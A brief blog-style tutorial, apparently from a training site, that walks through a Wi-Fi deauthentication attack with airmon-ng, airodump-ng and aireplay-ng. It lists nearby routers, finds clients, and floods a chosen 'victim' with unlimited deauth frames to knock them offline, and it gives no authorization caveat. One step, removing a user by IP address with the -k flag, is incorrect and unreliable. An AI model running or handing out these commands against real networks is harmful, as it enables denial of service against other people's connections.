Ready to Start Your Career?

By: Tomislav Balabanov
August 30, 2016
Remove Users from Your Network Using Airmon-ng

By: Tomislav Balabanov
August 30, 2016

- Open terminal
- Type: airmon-ng start wlan0
- That's it!
- Open a new terminal
- Type: airodump-ng wlan0
- Airodump-ng wlan0 will display all routers that are near you and you need to find your router BSSID.
- When you find your BSSID, in a new terminal, you need to type: airodump-ng --bssid (your bssid)
- Airodump-ng --bssid (your bssid) will display your victim's MAC addresses so you can remove them.
- Remove a user using their MAC address:aireplay-ng --deauth 0 -a ( your router bssid) -c (their mac address)
- Remove a user with their IP address:aireplay-ng --deauth 0 -a (your router bssid) -k (their ip address)